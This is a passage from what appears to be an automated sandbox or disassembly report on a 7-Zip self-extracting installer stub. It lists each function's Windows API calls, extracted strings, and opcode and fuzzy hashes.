                                          APIs
                                          • lstrlenW.KERNEL32(hAA,00000020,?,?,00405838,?,?,?,00000000,?), ref: 004040A4
                                            • Part of subcall function 00401A85: CharUpperW.USER32(?,7622E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                            • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404156
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040415E
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040416D
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404175
                                          Strings
                                          Similarity
                                          • API ID: ??3@$CharUpper$lstrlen
                                          • String ID: hAA
                                          • API String ID: 2587799592-1362906312
                                          • Opcode ID: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
                                          • Instruction ID: 7f7e13310b21401de90169bcc26cd057e2afddf23eedd5de54135d69024cf91c
                                          • Opcode Fuzzy Hash: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
                                          • Instruction Fuzzy Hash: D7212772D40215AACF20ABA4CC46AEB77B9DF90354F10407BEB41BB2E1E7789D848658
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000), ref: 00404D3E
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DA0
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DB8
                                            • Part of subcall function 00403354: lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                            • Part of subcall function 00403354: GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                            • Part of subcall function 00403354: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                            • Part of subcall function 00403354: ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                          Strings
                                          Similarity
                                          • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                          • String ID: 03A$;!@Install@!UTF-8!$;!@InstallEnd@!
                                          • API String ID: 4038993085-2279431206
                                          • Opcode ID: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                          • Instruction ID: 637b7b13a9bcd1d52ea1019587bfa2fb4435f6835f564ae220b3123002230846
                                          • Opcode Fuzzy Hash: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                          • Instruction Fuzzy Hash: CE312D71D0021EEACF05EF92CD429EEBBB4BF44318F10042BE911762E1DB785649DB98
                                          APIs
                                          • EndDialog.USER32(?,00000000), ref: 00407579
                                          • KillTimer.USER32(?,00000001), ref: 0040758A
                                          • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004075B4
                                          • SuspendThread.KERNEL32(0000029C), ref: 004075CD
                                          • ResumeThread.KERNEL32(0000029C), ref: 004075EA
                                          • EndDialog.USER32(?,00000000), ref: 0040760C
                                          Similarity
                                          • API ID: DialogThreadTimer$KillResumeSuspend
                                          • String ID:
                                          • API String ID: 4151135813-0
                                          • Opcode ID: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                          • Instruction ID: ebb94c5c4675b2e6542c2b2cb7d5652cccd5624f9a00d71f737e39ca63bd9789
                                          • Opcode Fuzzy Hash: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                          • Instruction Fuzzy Hash: 9811BF70A08618BBD7212F15EE849E77BBDFB00756B00843AF523A05A0CB39BD00DA1D
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                            • Part of subcall function 00404343: ??3@YAXPAX@Z.MSVCRT(?,?,?,004177C4,004177C4,?,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 004043B6
                                          • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                          • wsprintfA.USER32 ref: 00404EBC
                                          Strings
                                          Similarity
                                          • API ID: ??3@$wsprintf
                                          • String ID: :Language:%u!$;!@Install@!UTF-8!$;!@InstallEnd@!
                                          • API String ID: 2704270482-1550708412
                                          • Opcode ID: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                          • Instruction ID: afe26c372a183c0ca4a1b7edc16cb7be903c3e4040aad79e05e22cec791dc9d0
                                          • Opcode Fuzzy Hash: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                          • Instruction Fuzzy Hash: D8115E71B00018BBCF00FB95CC42EFE77ADAB84705B10402EBA15E3182DB78AB028799
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000,00000000), ref: 004038C6
                                          • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000), ref: 00403904
                                          • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405), ref: 0040392A
                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788), ref: 00403932
                                          Strings
                                          Similarity
                                          • API ID: ??3@
                                          • String ID: %%T/$%%T\
                                          • API String ID: 613200358-2679640699
                                          • Opcode ID: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                          • Instruction ID: 53c9ca64f2466311d4136dbbff57d229d1af9e29f5fa76e56e45344ae10c91f3
                                          • Opcode Fuzzy Hash: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                          • Instruction Fuzzy Hash: 5011DD3190410EBACF05FFA1D857CEDBB79AE00708F50806AB511760E1EF79A785DB98
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403981
                                          • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 004039BF
                                          • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405), ref: 004039E5
                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784), ref: 004039ED
                                          Strings
                                          Similarity
                                          • API ID: ??3@
                                          • String ID: %%S/$%%S\
                                          • API String ID: 613200358-358529586
                                          • Opcode ID: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                          • Instruction ID: c240205f9e12946546b7747d8fd44f392230bc1153c6614d6b8016afa5fd7689
                                          • Opcode Fuzzy Hash: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                          • Instruction Fuzzy Hash: 1D11AD3190410EBACF05FFA1D856CEDBB79AE00708F51806AB511760E1EF78A789DB98
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403A3C
                                          • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 00403A7A
                                          • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405), ref: 00403AA0
                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784), ref: 00403AA8
                                          Strings
                                          Similarity
                                          • API ID: ??3@
                                          • String ID: %%M/$%%M\
                                          • API String ID: 613200358-4143866494
                                          • Opcode ID: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                          • Instruction ID: 5f6947e2f47a7d655e02fb84317d9747a35bc7200d49f7273ebe403b31479b31
                                          • Opcode Fuzzy Hash: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                          • Instruction Fuzzy Hash: C911AD3190410EBACF05FFA1D956CEDBB79AE00708F51806AB511760E1EF78A789DB58
                                          APIs
                                          • _CxxThrowException.MSVCRT(00000000,00414CFC), ref: 0040E4EE
                                          Strings
                                          Similarity
                                          • API ID: ExceptionThrow
                                          • String ID: $JA$4JA$DJA$TJA$hJA$xJA
                                          • API String ID: 432778473-803145960
                                          • Opcode ID: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                          • Instruction ID: 5492ea6659e041f1bcf420c4685f7038b08242b420f8f2c51a6428b2159ddc92
                                          • Opcode Fuzzy Hash: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                          • Instruction Fuzzy Hash: 7211A5F0541B419BC7308F16E544587FBF8AF907587218A1FD0AA9BA51D3F8A1888B9C
                                          APIs
                                            • Part of subcall function 0040BA46: ??2@YAPAXI@Z.MSVCRT(0000000C,?,0040C20C,004149B0,00000001,?,?,00000000), ref: 0040BA4B
                                          • ??3@YAXPAX@Z.MSVCRT(00000000,004149B0,00000001,?,?,00000000), ref: 0040C20D
                                            • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                            • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                            • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,004149B0,00000001,?,?,00000000), ref: 0040C245
                                          Strings
                                          Similarity
                                          • API ID: ??2@$??3@$memmove
                                          • String ID: IA$IA$IA
                                          • API String ID: 4294387087-924693538
                                          • Opcode ID: 85fc5e494f6b2b84d8098d484c2c91b8b6bfa0a3dc3e29a15476b27879269a5e
                                          • Instruction ID: 38d37476858cbe2739f158cf8086d9562841ccd83740beefedbf55b6536d6dac
                                          • Opcode Fuzzy Hash: 85fc5e494f6b2b84d8098d484c2c91b8b6bfa0a3dc3e29a15476b27879269a5e
                                          • Instruction Fuzzy Hash: 20B1C1B1900209DFCB54EFAAC8819DEBBB5BF48304F50852EF919A7291DB38A945CF54
                                          APIs
                                          • _CxxThrowException.MSVCRT(00100EC3,00414CFC), ref: 0040E83C
                                          • ??2@YAPAXI@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E864
                                          • memcpy.MSVCRT(00000000,?,?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?), ref: 0040E88D
                                          • ??3@YAXPAX@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E898
                                          Strings
                                          Similarity
                                          • API ID: ??2@??3@ExceptionThrowmemcpy
                                          • String ID: IA
                                          • API String ID: 3462485524-3293647318
                                          • Opcode ID: 87c970ed3d1d6bacfe04aab15aff8add49b6e5554cbd4f9de67434676486f6a2
                                          • Instruction ID: e9362666a157510f6fc1816af10740f0f0ab3f4ff6eb75305f8b2a096945a613
                                          • Opcode Fuzzy Hash: 87c970ed3d1d6bacfe04aab15aff8add49b6e5554cbd4f9de67434676486f6a2
                                          • Instruction Fuzzy Hash: 6811E5736003009BCB28AF57D880D6BFBE9AB84354714C83FEA59A7290D779E8954794
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: wsprintf$ExitProcesslstrcat
                                          • String ID: 0x%p
                                          • API String ID: 2530384128-1745605757
                                          • Opcode ID: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                          • Instruction ID: 6c9eba3c29ae2a0cc7ccd16f79f39b6d6218d418ab2b897ff95ca6c62132cda7
                                          • Opcode Fuzzy Hash: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                          • Instruction Fuzzy Hash: CF019E7580020CAFDB20AFA0DC45FDA777CBF44305F04486AF945A2081D738F6948FAA
                                          APIs
                                            • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000B), ref: 004071E0
                                            • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000C), ref: 004071E9
                                          • GetSystemMetrics.USER32(00000007), ref: 00407A51
                                          • GetSystemMetrics.USER32(00000007), ref: 00407A62
                                          • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00407B29
                                          Strings
                                          Similarity
                                          • API ID: MetricsSystem$??3@
                                          • String ID: 100%%
                                          • API String ID: 2562992111-568723177
                                          • Opcode ID: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                          • Instruction ID: d2e8aa6d75c6757367bbc63d1236441fd7733528c0e5853e38aed7656a5d7d9b
                                          • Opcode Fuzzy Hash: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                          • Instruction Fuzzy Hash: 0D31D771A047059FCB24DFA9C9419AEB7F4EF40308B00012EE542A26E1DB78FE44CF99
                                          APIs
                                          • wsprintfW.USER32 ref: 00407A12
                                            • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                            • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                          • GetDlgItem.USER32(?,000004B3), ref: 004079C6
                                            • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                            • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 004079E4
                                          Strings
                                          Similarity
                                          • API ID: TextWindow$ItemLength$??3@wsprintf
                                          • String ID: (%u%s)
                                          • API String ID: 3595513934-2496177969
                                          • Opcode ID: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                          • Instruction ID: 1b031bef2a273fddd3247fbc9e57f9590cc69a100d620b238320e5a3a24b3f72
                                          • Opcode Fuzzy Hash: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                          • Instruction Fuzzy Hash: 1401C8B15042147FDB107B65DC46EAF777CAF44708F10807FF516A21E2DB7CA9448A68
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
                                          • GetProcAddress.KERNEL32(00000000), ref: 00402211
                                          Strings
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetNativeSystemInfo$kernel32
                                          • API String ID: 2574300362-3846845290
                                          • Opcode ID: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                          • Instruction ID: b757a3d5c4c17e34abb063926c294d8abaed4bc4edbc3347b9308a3de004b423
                                          • Opcode Fuzzy Hash: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                          • Instruction Fuzzy Hash: 88F0B432E1521495CF20BBF48B0D6EF66E89A19349B1004BBD852F31D0E5FCCE8141EE
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040219F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64RevertWow64FsRedirection$kernel32
                                          • API String ID: 2574300362-3900151262
                                          • Opcode ID: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                          • Instruction ID: b94e249185ae4a70534d65e1a66e6cdcdba3a47a1e4784fabdbc91f5644b18b3
                                          • Opcode Fuzzy Hash: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                          • Instruction Fuzzy Hash: AFD0C934294201DBDB125FA0EE0E7EA3AB9FB04B0BF458035A920A00F0CBBC9644CA5C
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
                                          • GetProcAddress.KERNEL32(00000000), ref: 004021D1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64DisableWow64FsRedirection$kernel32
                                          • API String ID: 2574300362-736604160
                                          • Opcode ID: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                          • Instruction ID: 817513c890d082da38b6284c2862a66e2f32a8da2897575df7e5c1eb8648f331
                                          • Opcode Fuzzy Hash: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                          • Instruction Fuzzy Hash: 0DD012342443009BDB515FA09E0D7DA3EB4B705B07F508076A520E11D1CBFCA244C7AC
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                            • Part of subcall function 0040272E: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402ACD,?,?,00000000,00000000,00000000), ref: 00402760
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 1731127917-0
                                          • Opcode ID: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                          • Instruction ID: 3903ebf3ba6088976d83fc344d3b185d6a20d7f45533e28e7dbc13297377a7b4
                                          • Opcode Fuzzy Hash: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                          • Instruction Fuzzy Hash: 2831B3729041156ACB14FFA6DD81DEFB3BCEF00714B51403FF952B31E1EA38AA458658
                                          APIs
                                          • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406437,00000000,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FA8
                                          • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FC5
                                          • wsprintfW.USER32 ref: 00403FFB
                                          • GetFileAttributesW.KERNEL32(?), ref: 00404016
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PathTemp$AttributesFilewsprintf
                                          • String ID:
                                          • API String ID: 1746483863-0
                                          • Opcode ID: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                          • Instruction ID: 4b01c17e8612d334da970e7aef70975a1f373095b445c13461924cc76c43a46f
                                          • Opcode Fuzzy Hash: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                          • Instruction Fuzzy Hash: 1B113672100204BFCB01AF59CC85AADB7F8FF88755F50802EF905972E1DB78AA008B88
                                          APIs
                                          • CharUpperW.USER32(?,7622E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                          • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                          • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B03
                                          • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B13
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CharUpper
                                          • String ID:
                                          • API String ID: 9403516-0
                                          • Opcode ID: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                          • Instruction ID: 0ba0c8867aa888139ba8faa8f8ff432121b60ad667f2455bf366b55ac651d143
                                          • Opcode Fuzzy Hash: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                          • Instruction Fuzzy Hash: 02112E34A11269ABCF108F99C8446BAB7E8FF44356B504467F881E3290D77CDE51EB64
                                          APIs
                                            • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                            • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                            • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00407FED
                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040800D
                                          • GetDlgItem.USER32(?,000004B7), ref: 00408020
                                          • SetWindowLongW.USER32(00000000,000000FC,Function_00006F37), ref: 0040802E
                                            • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                            • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                            • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                            • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                            • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                            • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                            • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                            • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                            • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                            • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                            • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                            • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ItemWindow$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoLongShow
                                          • String ID:
                                          • API String ID: 2538916108-0
                                          • Opcode ID: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                          • Instruction ID: 9218ed989044434557cb474aaa53437228351995edfdd36a91d94446a14b3a18
                                          • Opcode Fuzzy Hash: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                          • Instruction Fuzzy Hash: 7D1186B1A402146BCB10BBB99D09F9EB7FDEB84B04F00446EB652E31C0D6B8DA008B54
                                          APIs
                                          • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00406814
                                          • GetSystemMetrics.USER32(00000031), ref: 0040683A
                                          • CreateFontIndirectW.GDI32(?), ref: 00406849
                                          • DeleteObject.GDI32(00000000), ref: 00406878
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                          • String ID:
                                          • API String ID: 1900162674-0
                                          • Opcode ID: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                          • Instruction ID: e152b01862f646c7a4819b14062263d5307cf72e2961abd6127bac75ebed32e6
                                          • Opcode Fuzzy Hash: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                          • Instruction Fuzzy Hash: A9116376A00205AFDB10DF94DC88FEAB7B8EB08300F0180AAED06A7291DB74DE54CF54
                                          APIs
                                          • memset.MSVCRT ref: 0040749F
                                          • SHBrowseForFolderW.SHELL32(?), ref: 004074B8
                                          • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 004074D4
                                          • SHGetMalloc.SHELL32(00000000), ref: 004074FE
                                            • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                            • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                          • String ID:
                                          • API String ID: 1557639607-0
                                          • Opcode ID: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                          • Instruction ID: 30b51fec80d89fd3ac1614d0428bedaa433d1aa4d1a510c8e8bcd0531de43efe
                                          • Opcode Fuzzy Hash: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                          • Instruction Fuzzy Hash: 43112171A00114ABDB10EBA5DD48BDE77FCAB84715F1040A9E505E7280DB78EF05CB75
                                          APIs
                                          • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004027F8
                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00402801
                                            • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                            • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                          • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,00000000), ref: 00402819
                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00402839
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@$EnvironmentExpandStrings$??2@
                                          • String ID:
                                          • API String ID: 612612615-0
                                          • Opcode ID: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                          • Instruction ID: 71972da321696c7643696fa2d61077c4bfdb6251f9c85b9dd911fab2e4c9aeed
                                          • Opcode Fuzzy Hash: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                          • Instruction Fuzzy Hash: EF017976D00118BADB04AB55DD41DDEB7BCEF48714B10417BF901B31D1EB746A4086A8
                                          APIs
                                            • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                            • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00413550,00413558), ref: 00403AFD
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00413550,00413558), ref: 00403B05
                                          • SetWindowTextW.USER32(?,?), ref: 00403B12
                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403B1D
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@TextWindow$Length
                                          • String ID:
                                          • API String ID: 2308334395-0
